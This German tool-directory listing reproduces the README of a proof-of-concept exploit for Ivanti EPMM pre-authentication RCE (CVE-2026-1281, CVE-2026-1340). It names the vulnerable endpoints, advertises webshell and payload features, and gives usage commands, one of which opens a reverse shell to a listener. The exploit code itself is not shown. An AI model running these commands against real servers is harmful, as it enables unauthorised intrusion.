Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — Proof of Concept für CVE-2026-1281 & CVE-2026-1340 – Ivanti EPMM Pre-Auth RCE über Bash-Arithmetik-Erweiterung | Kitploit
Tools/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Proof of Concept für CVE-2026-1281 & CVE-2026-1340 – Ivanti EPMM Pre-Auth RCE über Bash-Arithmetik-Erweiterung

Repository anzeigen
6123vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ HAFTUNGSAUSSCHLUSS: Dieser PoC dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die Nutzung ohne ausdrückliche Genehmigung ist illegal.

🎯 Beschreibung

Vollständiger Proof of Concept (PoC) für die Ausnutzung der Schwachstellen CVE-2026-1281 und CVE-2026-1340, die Ivanti Endpoint Manager Mobile (EPMM) betreffen. Diese Schwachstellen ermöglichen die Ausführung beliebigen Codes aus der Ferne (RCE) ohne Authentifizierung über einen Mechanismus der Bash-Arithmetik-Expansion.

Schwachstellen

  • CVE-2026-1281 : Code-Injection im Endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Code-Injection im Endpoint /mifs/c/aftstore/fob/
  • CVSS-Score : 9.8 (Kritisch)
  • Ausnutzung : Aktiv in freier Wildbahn (Zero-Day)

🚀 Funktionen

  • ✅ Automatisiertes Validierungs-Framework (8 Tests)
  • ✅ Pre-Auth RCE-Ausnutzung
  • ✅ Automatische Reverse Shell
  • ✅ Webshell-Bereitstellung
  • ✅ 50+ einsatzbereite Payloads
  • ✅ Erkennungsskripte für Blue Team
  • ✅ Vollständige Dokumentation

📦 Installation

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 Schnellstart

# Schwachstellentest
python3 exploit.py -t https://target.com -c

# RCE-Validierung
python3 exploit.py -t https://target.com --test-rce

# Reverse Shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 Dokumentation

  • Vollständige README - Detaillierte technische Dokumentation
  • Benutzerhandbuch - Schritt-für-Schritt-Anleitung
  • Payloads - Sammlung von 50+ Payloads
  • Red-Team-Leitfaden - Operative Szenarien

🔗 Referenzen

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs Analysis
  • CVE-2026-1281
  • CVE-2026-1340

👤 Autor

Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist

LinkedIn

⚖️ Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe Datei LICENSE für weitere Details.

🙏 Danksagungen

  • CERT-FR für die schnelle Warnung
  • Watchtowr Labs für die technische Analyse
  • Die Cybersicherheits-Community
Tool herunterladen